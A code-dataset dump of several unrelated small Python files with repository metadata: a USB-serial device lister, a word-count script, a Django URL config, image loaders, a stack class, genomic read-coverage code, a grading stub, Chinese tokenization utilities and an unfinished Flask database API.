|
py
|
import subprocess
def find_dev():
    """Return the names of USB-serial device nodes as one decoded string.

    Runs ``ls /sys/bus/usb-serial/devices/`` and returns its stdout with
    surrounding whitespace stripped (empty string when nothing is listed).
    The exit status is deliberately ignored, matching the original behavior.
    """
    cmd = ['ls', '/sys/bus/usb-serial/devices/']
    # subprocess.run with a captured stdout replaces the manual
    # Popen/read/close sequence and cannot leak the pipe file descriptor.
    result = subprocess.run(cmd, stdout=subprocess.PIPE)
    data = result.stdout.strip().decode('utf-8')
    print(data)
    return data
|
[
"wjrmffldrhrl@gmail.com"
] |
wjrmffldrhrl@gmail.com
|
d9f089ba5012ba7812eb465dae6271303b65bc12
|
2cbdab70099d227a229bbd355c44b3a12dcea8ea
|
/mapred/results/aap.py
|
952b4262f3e21b928b716f7138dc78ed108e0d34
|
[] |
no_license
|
Mitan/CS5344-StockTweets
|
559345353566f9eb7266109bf11dc04cb15f2482
|
5ad9ce63ac98ee06d70a9d2f6589e5519a1e0093
|
refs/heads/master
| 2020-06-02T15:20:19.384521
| 2015-04-30T08:42:09
| 2015-04-30T08:42:09
| 30,401,074
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
from collections import OrderedDict

# Aggregate integer counts per key from "key value" lines in appl.txt,
# preserving first-seen key order.
p = OrderedDict()
with open("appl.txt") as f:
    for i in f:
        l = i.rstrip().split()
        k = l[0]
        v = l[1]
        # Fix: dict.has_key() was removed in Python 3 — use the `in` operator.
        if k in p:
            p[k] = int(p[k]) + int(v)
        else:
            p[k] = int(v)
# Fix: iteritems() and the print statement are Python-2-only.
for h, a in p.items():
    print(h, a)
|
[
"kalraritz@hotmail.com"
] |
kalraritz@hotmail.com
|
df6051ac1a7d4ce35f0afbcc52ffb91a7cc50b5a
|
9dde95007fe49ba5b8457a8b9672cd66303e9daa
|
/managevm/urls.py
|
69db3673ad5ed0bd0ee2bbf9ffbc93360d8a1ded
|
[
"MIT"
] |
permissive
|
peacedata0/manage-vm
|
7c033cdc52b2de22fe0b089cac9f4a591a94591b
|
bab2d3e1b6fca9fbe1aa9d53dc555abc67f58ba1
|
refs/heads/master
| 2020-05-24T11:24:26.544652
| 2016-04-17T19:40:19
| 2016-04-17T19:40:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 810
|
py
|
"""managevm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('main.urls')),
]
|
[
"zujko@csh.rit.edu"
] |
zujko@csh.rit.edu
|
b13c0ad324dfe1dea4cb7bac8b46b4b8f2f757cf
|
5d9dd59ccb74745976f5d13c00ac9c9bb5b22f7b
|
/genData.py
|
3718c74dfac46be532244289e7fa181b216dcc87
|
[] |
no_license
|
Supeking/vgg19-preTrain
|
0270eb86e8a0fa75f915aa393cb643cc7ec60614
|
459700968e812a3848938a58ed414d907b529817
|
refs/heads/master
| 2020-07-06T10:05:44.315065
| 2019-08-18T09:14:51
| 2019-08-18T09:14:51
| 202,980,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 671
|
py
|
import cv2
from glob import glob
import os
import random
path_P = './task7_insulator/P'
path_N = './task7_insulator/N'
def readImg_P():
    """Yield positive-class images forever, reshuffling each pass.

    Reads every ``*.jpg`` under ``path_P``, resizes to 448x448 and scales
    pixel values to [0, 1].
    """
    P = glob(os.path.join(path_P, '*.jpg'))
    # Fix: the original also globbed path_N here but never used the result.
    while 1:
        random.shuffle(P)
        for imgPath in P:
            # imgPath is already a full path; wrapping it in os.path.join()
            # was a no-op in the original.
            img = cv2.imread(imgPath)
            img = cv2.resize(img, (448, 448)) / 255.0
            yield img
def readImg_N():
    """Yield negative-class images forever, reshuffling each pass.

    Reads every ``*.jpg`` under ``path_N``, resizes to 448x448 and scales
    pixel values to [0, 1].
    """
    N = glob(os.path.join(path_N, '*.jpg'))
    while 1:
        random.shuffle(N)
        for imgPath in N:
            # imgPath is already a full path; os.path.join() around it was a no-op.
            img = cv2.imread(imgPath)
            img = cv2.resize(img, (448, 448)) / 255.0
            yield img
|
[
"noreply@github.com"
] |
Supeking.noreply@github.com
|
0324e1ecee3ef141ffae62cecdf089f009b2bb68
|
de95e9ace929f6279f5364260630e4bf7a658c1c
|
/stack.py
|
89f33daacded1cf737e1c66b1c1acc59e93f24a9
|
[] |
no_license
|
ludwigwittgenstein2/Algorithms-Python
|
ceaf0739b8582f7bd749a9b3f52f283765044744
|
c5bed8b2e398c218d1f36e72b05a3f5545cf783a
|
refs/heads/master
| 2021-06-19T11:40:31.012268
| 2017-07-02T04:59:20
| 2017-07-02T04:59:20
| 75,953,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 334
|
py
|
class Stack:
    """A LIFO stack backed by a Python list (top of stack = end of list)."""

    def __init__(self):
        self.items = []

    def isEmpty(self):
        """Return True when the stack holds no items."""
        return self.items == []

    def push(self, item):
        """Place *item* on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item.

        Fix: the original called list.pop() but discarded its return value,
        so callers could never retrieve what they popped.
        """
        return self.items.pop()

    def peek(self):
        """Return the top item without removing it."""
        return self.items[len(self.items) - 1]

    def size(self):
        """Return the number of items on the stack."""
        return len(self.items)
|
[
"penpals.oranges14@gmail.com"
] |
penpals.oranges14@gmail.com
|
520a7fec37510d48d644de979c7f5d4f4a79ab30
|
b3c30e4683df07096c0aa0ecf6be1443dfa60de9
|
/high_vs_low_performer_dup_coverage.py
|
c38daea203fbea669d07ba8d198d2ee8e25ded6d
|
[] |
no_license
|
B-Rich/Suecica
|
cd26cacf90daa546dc74d64e7ff79e696f9278a6
|
bbd3b66750b03f3cefe06e10b60370f08a06df2e
|
refs/heads/master
| 2021-01-22T02:12:47.790301
| 2013-06-14T16:27:43
| 2013-06-14T16:27:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,417
|
py
|
#!/usr/bin/env python3
from collections import Counter
import gzip
import sys; sys.path.append('../Packages/')
from GenomeTools import GFF
# Compare per-gene read coverage between high- and low-performing F2 groups.
# Alternate input/output configurations are kept below, commented out.
#dup_filename = ""
#dup_filename = "Data/As_Duplications_Meiosis_Genes_(Aa_Filtered).txt"
dup_filename = "Data/As_Duplications_(Aa_Filtered).txt"
high_filename = "Data/Sue/SxN_F2s/HighPerformers/Al_filtered_SAM/HighPerformers.sam.gz"
low_filename = "Data/Sue/SxN_F2s/LowPerformers/Al_filtered_SAM/LowPerformers.sam.gz"
#outfilename = "Output/High_vs_Low_Meiosis_Reads.txt"
outfilename = "Output/High_vs_Low_AllDupGene_Reads.txt"
#outfilename = "Output/High_vs_Low_AllGene_Reads.txt" # For this: dup_filename = ""
#high_filename = "Data/Sue/SxN_F2s/RandomExp/HighPerformers/Al_filtered_SAM/HighPerformers.sam.gz"
#low_filename = "Data/Sue/SxN_F2s/RandomExp/LowPerformers/Al_filtered_SAM/LowPerformers.sam.gz"
#outfilename = "Output/High_vs_Low_RandomGroups_AllDupGene_Reads.txt"
gff_file = "../Thalyrata.gff"
# Running totals of aligned reads per group, and per-gene read counters.
high_total_cov = 0
low_total_cov = 0
high_gene_reads = Counter()
low_gene_reads = Counter()
# Open GFF file and make dictionary containing gene names & their positions
# (GFF is a project-local module; Parse's exact return type not visible here).
gff_genes_dict = GFF.Parse(gff_file, create_nuc_dict=True)
# Open list of duplicated meiosis genes and store them
if dup_filename != "":
    dup_genes = []
    with open(dup_filename) as infile:
        for line in infile:
            line = line.strip()
            dup_genes.append(line)
    # NOTE(review): counts start at 1 (pseudocount) — presumably to avoid
    # division by zero in the final ratio; confirm intent.
    for entry in dup_genes:
        high_gene_reads[entry] = 1
        low_gene_reads[entry] = 1
# Examine all duplicated genes, not just meiosis duplicated genes
if dup_filename == "":
    dup_genes = gff_genes_dict.gene_dict.keys()
    for entry in gff_genes_dict.gene_dict.keys():
        high_gene_reads[entry] = 1
        low_gene_reads[entry] = 1
# Count up the number of reads per gene for the High Performers file
# (SAM format: lines starting with "@" are headers; col 3 = chromosome,
# col 4 = 1-based leftmost mapping position).
with gzip.open(high_filename, 'rb') as infile:
    for line in infile:
        line = line.decode('utf-8')
        if line[:1] != "@":
            line = line.split("\t")
            high_total_cov += 1
            chromosome = str(line[2])
            s_pos = int(line[3])
            gene_name = gff_genes_dict.get_gene_name(chromosome, s_pos)
            if gene_name != None:
                high_gene_reads[gene_name] += 1
# Count up the number of reads per gene for the Low Performers file
with gzip.open(low_filename, 'rb') as infile:
    for line in infile:
        line = line.decode('utf-8')
        if line[:1] != "@":
            line = line.split("\t")
            low_total_cov += 1
            chromosome = str(line[2])
            s_pos = int(line[3])
            gene_name = gff_genes_dict.get_gene_name(chromosome, s_pos)
            if gene_name != None:
                low_gene_reads[gene_name] += 1
# Normalize high performing individuals' read counts
# (scale factor makes the high-performer totals comparable to the low group).
high_dif = low_total_cov / high_total_cov
if high_total_cov > low_total_cov:
    print("High Performer group reads are scaled down by ", str(high_dif), sep='')
else:
    print("High Performer group reads are scaled up by ", str(high_dif), sep='')
high_gene_reads = {gene_name: x * high_dif for gene_name, x in high_gene_reads.items()}
# Output ratio of high performing vs. low performing reads
with open(outfilename, 'w') as outfile:
    outline = "Gene\tHighPerformanceNormalizedCount\tLowPerformanceNormalizedCount\tRatio\n"
    outfile.write(outline)
    for gene in sorted(dup_genes):
        outline = "\t".join([gene, str(high_gene_reads[gene]), str(low_gene_reads[gene]), str(round(high_gene_reads[gene]/low_gene_reads[gene],2)), "\n"])
        outfile.write(outline)
|
[
"mdporter@ucdavis.edu"
] |
mdporter@ucdavis.edu
|
060911f150471af95103a2ef84238b3cda7db2d3
|
425985723e44ada0de949b12c42f01308ca6adbe
|
/poco/main/media/course_1/module_3/assessmentFiles/challenge_2.py
|
b0e0ac1c743eba93c6fc9553831f145adb5bbb2d
|
[] |
no_license
|
Bharathkumar-nb/Poco-Localization
|
d5f900bff3abae51fe187a2678b6b5375e2d870b
|
8a9264b87d243c5f42765f1281b8674de353da83
|
refs/heads/master
| 2022-12-10T07:18:25.243018
| 2017-05-02T22:07:58
| 2017-05-02T22:07:58
| 89,995,931
| 1
| 0
| null | 2022-12-07T23:40:35
| 2017-05-02T05:45:29
|
HTML
|
UTF-8
|
Python
| false
| false
| 777
|
py
|
#Module 0
#Challenge 2
'''
x = '23'
'''
import sys
def report(name, shortd, longd):
    """Print one diagnostic record: a name plus short and long descriptions."""
    print(str({'Name': name, 'Short': shortd, 'Long': longd}))
#Mock data goes first
# NOTE: "&&&" is a template placeholder — the grader substitutes the student's
# code before running, so this file is intentionally not valid Python as-is.
try:
    &&& # paste user code here
except Exception as e:
    report('Generic error', 'On your own', 'Look for typos')
    sys.exit(1)
# Check that the student actually defined the variable y.
try:
    y # does var exist?
except NameError as e:
    report('Name error', "Don't see y on left", 'Look for typos')
    sys.exit(1)
# y must be a string (the exercise expects the literal '23' with quotes).
if not isinstance(y, str):
    report('Data type bug', "Did you type the '23' correctly?", 'It should have quotes around it')
    sys.exit(1)
# Finally verify the exact value.
try:
    check = (y == '23')
except Exception as e:
    report('Generic error', "On your own", 'Look for typos')
else:
    if not check:
        report('Value bug', "'Did you type '23' with quotes?", 'Look for typos')
|
[
"bharathkmr.nb@gmail.com"
] |
bharathkmr.nb@gmail.com
|
ebfac981b788884abacf358c0e34af682a4c3c70
|
d7fc794b9fd3635ee403999af75bfb7ace8c0963
|
/codes/allMycats1.py
|
182c6300882229536b855a57dcfb2f27e29f7a67
|
[] |
no_license
|
gbt1988/PythonToWork
|
ff29d7bbb20397d1745ef1211dbe07a525eb3554
|
0944fcc3f991c2cd6352404bc55175316e2c19e2
|
refs/heads/master
| 2021-01-09T12:40:09.995303
| 2020-03-08T13:20:07
| 2020-03-08T13:20:07
| 242,303,958
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 447
|
py
|
# Collect six cat names interactively, then echo them back on one line.
# A loop replaces the original's six copy-pasted prompt/input pairs while
# producing byte-identical prompts and output.
catNames = []
for i in range(1, 7):
    print('Enter the name of cat ' + str(i) + ':')
    catNames.append(input())
print('The cat names are:')
print(' '.join(catNames))
|
[
"kaihuasun@163.com"
] |
kaihuasun@163.com
|
f11d2fe34d4382c50aa6e64282213993a90932ca
|
f869fb919cf506cbb55ef911841a97487837a87c
|
/model/data_utils.py
|
a9428af30bf4673d400ccce9708a957258d3431c
|
[] |
no_license
|
Won-Andwon/RNN_Mood_QA
|
7c3175de471e0515cfeabc4196186e18bec5dcf7
|
f1ebb392a45d2a48c9faf86ff013ae049a9d6009
|
refs/heads/master
| 2021-01-14T08:06:04.195959
| 2017-08-02T12:35:43
| 2017-08-02T12:35:43
| 81,922,793
| 0
| 0
| null | 2017-08-27T02:52:29
| 2017-02-14T08:27:20
|
Python
|
UTF-8
|
Python
| false
| false
| 12,932
|
py
|
# 此处部分代码部分来源于
# https://github.com/tensorflow/models/tree/master/tutorials/rnn/translate
# 有改动和添加 因为是源码改动 所以没有import 借鉴的部分的链接如上
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import sys
from tensorflow.python.platform import gfile
import tensorflow as tf
import jieba
_PAD = "_PAD"
_GO = "_GO"
_EOS = "_EOS"
_UNK = "_UNK"
_DIG = "_DIG"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# ?!《》{}-——+=、 字符数字的去除
_WORD_SPLIT = re.compile("([.,!?\"':;,。;“‘’”:)(])")
_DIGIT_RE = re.compile(r"\d")
# 我去掉了符号?!?! 这两个很常用且能表意
_SPECIAL_CHAR = " \t\\,./;'\"" \
"[]`~@#$%^&*()_+-={}:<>" \
"~~·@#¥%……&*()——【】:“”;’‘《》,。、" \
"abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
"ばれやうしヾヘてまにづらでノつゥヽすりっい`がのかえよみんおねッグ" \
"①②③④adeеghнknoοQtU🇮с×а" \
"αnΘ" \
"︺︹」└「┍┑╯╰╭╮︶‿/\〉|∠>〉︿─_ ̄=◡⌒" \
"Σ≤≥≧≦єεз←→↓≡⊂⊃∩∀⊙▽∇△∈≠›" \
"" ◉◕。ಥ❁ω♡ㅂl-﹏´" \
"ԅы•ⅱдлшوΠ�.●・ฅ°✧・□〃%℃@☞☜✲゚〜˘ˇé︴゜#"
_MYDICT = r"../resource/mydict.txt"
def basic_tokenizer(sentence, chs=True, char_level=False):
    """Split *sentence* into a list of lowercase tokens.

    :param sentence: raw input sentence
    :param chs: True -> unsegmented Chinese, tokenize with jieba;
        False -> whitespace/punctuation-based splitting
    :param char_level: tokenize per character instead of per word
    :return: list of tokens (special characters filtered out)
    """
    if char_level:
        # Character-level: keep every character not in the blacklist.
        return [ch for ch in sentence.strip() if ch not in _SPECIAL_CHAR]
    if chs:
        # Chinese word segmentation via jieba (accurate mode).
        segmented = jieba.cut(sentence.strip(), cut_all=False)
        return [tok.lower() for tok in segmented if tok not in _SPECIAL_CHAR]
    # Non-Chinese: split on whitespace, then on punctuation.
    pieces = []
    for fragment in sentence.strip().split():
        pieces.extend(_WORD_SPLIT.split(fragment))
    return [piece.lower() for piece in pieces if piece]
def create_vocabulary(vocabulary_path, data_path_list,
                      max_character_size, tokenizer=None,
                      chs=True, char_level=False,
                      normalize_digits=True):
    """
    Create the vocabulary file if it does not already exist.
    :param vocabulary_path: where the vocabulary file is written
    :param data_path_list: list of data-file paths used to build the vocabulary
    :param max_character_size: maximum number of entries kept in the vocabulary
    :param tokenizer: optional custom tokenizer (defaults to basic_tokenizer)
    :param chs: Chinese mode (unsegmented Chinese text)
    :param char_level: tokenize per character instead of per word
    :param normalize_digits: replace every digit with the _DIG token
    :return:
    """
    # data_path_list is a list of file paths
    if not gfile.Exists(vocabulary_path):
        print("创建词汇表")
        vcb = {}  # word -> occurrence count
        for path in data_path_list:
            with gfile.GFile(path, mode="r") as f:
                print("处理%s文件" % path)
                counter = 0
                for line in f:
                    counter += 1
                    if counter % 10000 == 0:
                        print("已处理%s行" % counter)
                    line = tf.compat.as_text(line)
                    tokens = tokenizer(line) if tokenizer else basic_tokenizer(line, chs, char_level)
                    for token in tokens:
                        word = _DIGIT_RE.sub(_DIG, token) if normalize_digits else token
                        if word in vcb:
                            vcb[word] += 1
                        else:
                            vcb[word] = 1
        # Special tokens first, then words by descending frequency;
        # truncate to the requested vocabulary size.
        vocab_list = _START_VOCAB + sorted(vcb, key=vcb.get, reverse=True)
        if len(vocab_list) > max_character_size:
            vocab_list = vocab_list[:max_character_size]
        with gfile.GFile(vocabulary_path, mode="w") as vocabulary_file:
            for w in vocab_list:
                vocabulary_file.write(w + "\n")
    else:
        print("词汇表已存在,如果不对应请删除后再次运行。")
def initialize_vocabulary(vocabulary_path):
    """Load a vocabulary file from disk.

    :param vocabulary_path: path of the vocabulary file (one token per line)
    :return: (dict mapping word -> id, list mapping id -> word)
    :raises ValueError: when the file does not exist
    """
    if not gfile.Exists(vocabulary_path):
        raise ValueError("Vocabulary file %s not found.", vocabulary_path)
    with gfile.GFile(vocabulary_path, mode="r") as f:
        rev_vocab = [tf.compat.as_text(raw.strip()) for raw in f.readlines()]
    vocab = {word: idx for idx, word in enumerate(rev_vocab)}
    return vocab, rev_vocab
def sentence_to_token_ids(sentence, vocabulary,
                          tokenizer=None, chs=True, char_level=False,
                          normalize_digits=True):
    """Convert *sentence* into a list of vocabulary ids.

    Unknown words map to UNK_ID; with *normalize_digits* every digit is
    replaced by _DIG before lookup.

    :param sentence: raw sentence
    :param vocabulary: dict mapping word -> id
    :param tokenizer: optional custom tokenizer (defaults to basic_tokenizer)
    :return: list of token ids
    """
    words = tokenizer(sentence) if tokenizer else basic_tokenizer(sentence, chs, char_level)
    if normalize_digits:
        return [vocabulary.get(_DIGIT_RE.sub(_DIG, word), UNK_ID) for word in words]
    return [vocabulary.get(word, UNK_ID) for word in words]
def data_to_token_ids(data_path, target_path, vocabulary_path,
                      tokenizer=None, chs=True, char_level=False,
                      normalize_digits=True):
    """Tokenize every line of data_path into ids and write them to target_path.

    One space-separated id line is written per input line. The work is
    skipped entirely when target_path already exists.
    """
    if not gfile.Exists(target_path):
        print("Tokenizing data in %s" % data_path)
        vocab, _ = initialize_vocabulary(vocabulary_path)
        with gfile.GFile(data_path, mode="r") as data_file:
            with gfile.GFile(target_path, mode="w") as tokens_file:
                counter = 0
                for line in data_file:
                    counter += 1
                    if counter % 10000 == 0:
                        print(" tokenizing line %d" % counter)
                    token_ids = sentence_to_token_ids(tf.compat.as_text(line), vocab,
                                                      tokenizer,
                                                      chs=chs, char_level=char_level,
                                                      normalize_digits=normalize_digits)
                    tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n")
    else:
        print("Tokenizing data is existed.(%s)" % target_path)
def prepare_data(data_dir, from_train_path, to_train_path, from_dev_path, to_dev_path,
                 vocabulary_size, tokenizer=None, chs=True, char_level=False):
    """
    Convert the training/dev files into token-id files.
    :param data_dir: directory that will hold the vocabulary file
    :param from_train_path: "prompt" side of the training dialogs
    :param to_train_path: "response" side of the training dialogs
    :param from_dev_path: "prompt" side of the dev dialogs
    :param to_dev_path: "response" side of the dev dialogs
    :param vocabulary_size: size of the vocabulary to build/use
    :param tokenizer: optional custom tokenizer
    :param chs: Chinese mode
    :param char_level: character-level tokenization
    :return: (train prompt ids path, train response ids path,
              dev prompt ids path, dev response ids path,
              vocabulary path)
    """
    # Filename suffix encodes language mode, tokenization level and vocab size.
    postfix = ".%s.%s.ids%d" % ("zh" if chs else "en", "ch" if char_level else "vcb", vocabulary_size)
    vocab_path = os.path.join(data_dir, "vocabulary%d.txt" % vocabulary_size)
    create_vocabulary(vocab_path, [from_train_path, to_train_path], vocabulary_size, tokenizer,
                      chs=chs, char_level=char_level)
    to_train_ids_path = to_train_path + postfix
    from_train_ids_path = from_train_path + postfix
    data_to_token_ids(to_train_path, to_train_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
    data_to_token_ids(from_train_path, from_train_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
    to_dev_ids_path = to_dev_path + postfix
    from_dev_ids_path = from_dev_path + postfix
    data_to_token_ids(to_dev_path, to_dev_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
    data_to_token_ids(from_dev_path, from_dev_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
    return (from_train_ids_path, to_train_ids_path,
            from_dev_ids_path, to_dev_ids_path,
            vocab_path)
def train_text_to_ids(para, vcb_sz=None, ch_lvl=None, chs_md=None):
    """
    Convert the files referenced by *para* into id-based representations.
    :param para: config object providing from/to train & dev data paths,
        data_dir, vocabulary_size, ch_level and chs_mode
    :param vcb_sz: optional override for para.vocabulary_size
    :param ch_lvl: optional override for para.ch_level
    :param chs_md: optional override for para.chs_mode
    :return: (from_train, to_train, from_dev, to_dev, vocab_path) paths,
        or all None when the training file paths are missing from *para*
    """
    from_train = None
    to_train = None
    from_dev = None
    to_dev = None
    vocab_path = None
    vocabulary_size = para.vocabulary_size if vcb_sz is None else vcb_sz
    ch_level = para.ch_level if ch_lvl is None else ch_lvl
    chs_mode = para.chs_mode if chs_md is None else chs_md
    if para.from_train_data and para.to_train_data:
        from_train_data = para.from_train_data
        to_train_data = para.to_train_data
        # Fall back to the training files when no dev files are given.
        from_dev_data = from_train_data
        to_dev_data = to_train_data
        if para.from_dev_data and para.to_dev_data:
            from_dev_data = para.from_dev_data
            to_dev_data = para.to_dev_data
        from_train, to_train, from_dev, to_dev, vocab_path = prepare_data(
            para.data_dir,
            from_train_data, to_train_data,
            from_dev_data, to_dev_data,
            vocabulary_size, chs=chs_mode, char_level=ch_level)
        return from_train, to_train, from_dev, to_dev, vocab_path
    else:
        print("Please specify the file path in %s" % para.data_dir)
        return from_train, to_train, from_dev, to_dev, vocab_path
def read_data_from_many_id_files(paths):
    """Concatenate token ids from several id files into one flat list.

    An EOS_ID is appended after each input line's ids.

    :param paths: iterable of id-file paths
    :raises ValueError: when a file does not exist
    """
    data = []
    for path in paths:
        if not gfile.Exists(path):
            raise ValueError("file %s not found.", path)
        with gfile.GFile(path, mode="r") as f:
            for line in f:
                data.extend(int(tok) for tok in line.split())
                data.append(EOS_ID)
    return data
def read_sentences_from_many_id_files(paths):
    """Read id files into a list of id-lists, one per non-empty line.

    :param paths: iterable of id-file paths
    :raises ValueError: when a file does not exist
    """
    sentence_list = []
    for path in paths:
        if not gfile.Exists(path):
            raise ValueError("file %s not found.", path)
        with gfile.GFile(path, mode='r') as f:
            for line in f:
                ids = [int(tok) for tok in line.split()]
                # Skip blank lines so no empty sentences are stored.
                if ids:
                    sentence_list.append(ids)
    return sentence_list
def read_data(source_path, target_path, max_size=None, max_len=20):
    """Read parallel source/target id files into [source_ids, target_ids] pairs.

    Only pairs whose source and target both contain between 1 and *max_len*
    tokens are kept; the kept source ids are right-padded with PAD_ID up to
    *max_len* (targets are left unpadded, as in the original).

    :param source_path: id file for the source side
    :param target_path: id file for the target side
    :param max_size: stop after this many line pairs (None/0 = no limit)
    :param max_len: maximum (and padded) sentence length; the default 20
        preserves the previously hard-coded bucket size
    :return: list of [source_ids, target_ids] pairs
    """
    data_set = []
    with tf.gfile.GFile(source_path, mode="r") as source_file:
        with tf.gfile.GFile(target_path, mode="r") as target_file:
            source, target = source_file.readline(), target_file.readline()
            counter = 0
            while source and target and (not max_size or counter < max_size):
                counter += 1
                if counter % 50000 == 0:
                    print(" reading data line %d" % counter)
                    sys.stdout.flush()
                source_ids = [int(x) for x in source.split()]
                target_ids = [int(x) for x in target.split()]
                len_s = len(source_ids)
                len_t = len(target_ids)
                if 0 < len_s <= max_len and 0 < len_t <= max_len:
                    source_ids.extend([PAD_ID for _ in range(max_len - len_s)])
                    data_set.append([source_ids, target_ids])
                source, target = source_file.readline(), target_file.readline()
    return data_set
def read_id2vec(source_path, vocabulary_size):
    """Read up to *vocabulary_size* float vectors, one whitespace-separated
    vector per line, and return them as a list of float lists.
    """
    vec_set = []
    with tf.gfile.GFile(source_path, mode="r") as source_file:
        counter = 0
        line = source_file.readline()
        while line and counter < vocabulary_size:
            counter += 1
            if counter % 50000 == 0:
                print(" reading vector line %d" % counter)
                sys.stdout.flush()
            vec_set.append([float(part) for part in line.split()])
            line = source_file.readline()
    return vec_set
|
[
"perfect0penguin@gmail.com"
] |
perfect0penguin@gmail.com
|
d2c95d546b0c5d0ae023efb6cf4793ed337de2ea
|
f5cdcface93fa1b1899b66354c4eb84dc6cb9a25
|
/Database_flask/app.py
|
f0c84485f936e2cfa2be1377416d76fefe680150
|
[] |
no_license
|
shivanshjayara/Flask_DB
|
d90445bdd8164be8a82bca58ef94c2729641b2c1
|
b92d36e972a56b3da32184f0c70016a64b13da2e
|
refs/heads/main
| 2023-05-22T02:45:23.374693
| 2021-06-14T06:51:00
| 2021-06-14T06:51:00
| 376,554,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,936
|
py
|
from flask import Flask, request, jsonify
from mongo_db import mongo_db_class
from mysql_db import mysql_db_class
import logging as lg
app = Flask(__name__)
lg.basicConfig(filename='flask_log_file.txt', level=lg.INFO,
format='%(asctime)s, %(name)s, %(levelname)s, %(message)s', datefmt='%Y-%m-%d')
@app.route('/create', methods=['POST'])
def create_database():
    """Create the project's database and table in the store named by the
    JSON body's ``Database_Type`` ('mysql' or 'mongodb').

    Returns a JSON confirmation string on success. NOTE(review): for a GET
    request, an unknown Database_Type, or a swallowed exception, the view
    falls through and returns None — Flask will raise for that; the log
    messages mention Cassandra but no branch handles it. Confirm intended.
    """
    db_name = 'flask1_database'
    table_name = 'customer_details'
    lg.info('Checking for method type')
    try:
        lg.info('Checking for Method whether it is POST or GET')
        if request.method == 'POST':
            lg.info('Method was found "POST"')
            database_type = request.json['Database_Type']
            lg.info(
                'Setting database type variable for entering the type of database which you want to proceed with')
            lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
            if database_type == 'mysql':
                lg.info('User has mention MySql database')
                try:
                    lg.info('Creating an object of "class mysql_db_class"')
                    mysql_object = mysql_db_class(db_name, table_name)
                    lg.info(f'Calling "create database function" which will create a database: {db_name}')
                    mysql_object.create_database()
                except Exception as e:
                    # Failure is logged but not re-raised; the success message
                    # below is returned regardless.
                    print(e)
                    lg.error(e)
                lg.info('Database and table both has been created. For confirmation please check in your workbench')
                return jsonify(
                    f'{database_type} database and table are created. Database name: {db_name} and table name :{table_name}')
            if database_type == 'mongodb':
                lg.info('User has mention MongoDB database')
                lg.info('Creating an object of "mongo_db_class"')
                mongodb_object = mongo_db_class(db_name, table_name)
                lg.info(f'Calling "create function" which will create database: {db_name} and table: {table_name}')
                mongodb_object.create()
                lg.info('Finally database and table both are created now')
                return jsonify(
                    f'{database_type} database and collection both are created. Database name is: {db_name} and collection name is: {table_name}')
    except Exception as e:
        print(e)
        lg.error(e)
@app.route('/insert_single', methods=['POST'])
def insert():
    """Insert one record into the customer_details table of the store named
    by the JSON body's ``Database_Type`` ('mysql' or 'mongodb').

    Returns a JSON confirmation string; an unknown type falls through and
    returns None (Flask error) — NOTE(review): confirm intended.
    """
    db_name = 'flask1_database'
    table_name = 'customer_details'
    lg.info(f'Calling insertion function just for inserting a single record into table {table_name}')
    lg.info('Checking for Method whether it is POST or GET')
    if request.method == 'POST':
        lg.info('Method was found "POST"')
        lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
        lg.info('Declaring a variable which will receive a database type from the user')
        database_type = request.json['Database_Type']
        if database_type == 'mysql':
            lg.info('User has mention MySql database')
            lg.info('Creating an object of "mysql_db_class"')
            mysql_object = mysql_db_class(db_name, table_name)
            lg.info(
                f'Calling "insert single record function" which will insert a single record in table: {table_name}')
            mysql_object.insert_single()
            lg.info('Finally single record is inserted')
            return jsonify(
                f'Single Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
        if database_type == 'mongodb':
            lg.info('User has mention MongoDB database')
            lg.info('Creating an object of "mongo_db_class"')
            mongodb_object = mongo_db_class(db_name, table_name)
            lg.info(
                f'Calling "insert_single_document function" which will insert a single record in table: {table_name}')
            mongodb_object.insert_single_document()
            lg.info('Finally single record is inserted')
            return jsonify(
                f'Single Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
@app.route('/update_table', methods=['POST'])
def update_table():
    """Update records in the fixed customer table.

    Expects a JSON body with a 'Database_Type' key ('mysql' or 'mongodb').

    Fix: unknown database types and non-POST calls used to return None
    (Flask 500); they now return an explicit JSON message.
    """
    db_name = 'flask1_database'
    table_name = 'customer_details'
    lg.info(f'Calling update function for updating table {table_name}')
    if request.method == 'POST':
        # Which backend the caller wants.
        database_type = request.json['Database_Type']
        if database_type == 'mysql':
            lg.info('User has mention MySql database')
            mysql_object = mysql_db_class(db_name, table_name)
            lg.info(f'Calling "update table function" which will insert a single record in table: {table_name}')
            mysql_object.update_table()
            lg.info('Finally table is updated')
            return jsonify(
                f'Data is updated successfully in table: {table_name} in database: {db_name} of {database_type}')
        if database_type == 'mongodb':
            lg.info('User has mention Mongodb database')
            mongodb_object = mongo_db_class(db_name, table_name)
